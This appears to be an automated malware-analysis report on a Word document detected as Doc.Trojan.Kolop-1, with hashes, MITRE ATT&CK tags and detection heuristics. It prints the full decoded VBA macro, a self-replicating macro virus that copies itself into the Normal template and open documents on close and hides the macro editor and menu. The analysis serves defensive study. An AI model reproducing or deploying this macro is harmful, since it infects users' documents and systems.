Office (OLE) malware analysis — malicious · 39febc35b9a6d8f9

MALICIOUS

Office (OLE)

38.5 KB Created: 2001-05-30 23:49:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: f796cb14f3e74188d602eff55bf590cc SHA-1: 90b9bc365ac74a6d0f7c25ae63398045470e1c42 SHA-256: 39febc35b9a6d8f9eaa0e0787ed3678e6ca925f468a97c07468dc012bbd89391

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Kolop-1', indicating a known malware variant. It contains VBA macros that are designed to execute upon document interaction, likely to download or execute further payloads. The macro code attempts to hide itself and disable macro visibility, suggesting a malicious intent to evade detection.

Heuristics 2

ClamAV: Doc.Trojan.Kolop-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Kolop-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1488 bytes
SHA-256: `498446ff31094514c3c4bcd30ad818115e9086b6a74db92d69445109dc86efbd`
Detection ClamAV: Doc.Trojan.Kolop-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Kolopatia Private Sub Document_Close(): d = d + 1 ShowVisualBasicEditor = False: Application.DisplayAlerts = wdAlertsNone vLin = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, _ ThisDocument.VBProject.VBComponents(d).CodeModule.CountOfLines) If NormalTemplate.VBProject.VBComponents(d).CodeModule.Lines(d, d) <> "'Kolopatia" Then With NormalTemplate.VBProject.VBComponents(d).CodeModule .DeleteLines d, .CountOfLines: .AddFromString vLin End With End If If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(d, d) <> "'Kolopatia" Then With ActiveDocument.VBProject.VBComponents(d).CodeModule .DeleteLines d, .CountOfLines: .AddFromString vLin End With End If ActiveDocument.SaveAs ActiveDocument.FullName NormalTemplate.Save If Day(Now()) = 7 Then With Application .Caption = Application.UserName With .Assistant .Animation = msoAnimationGreeting End With End With End If CommandBars("Tools").Controls("Macro").Visible = False End Sub 'Kolopatia by e[ax] 'Authorized Distribution for Bosnia and Herzegovina

Open this report in the interactive analyzer, or submit your own file for analysis.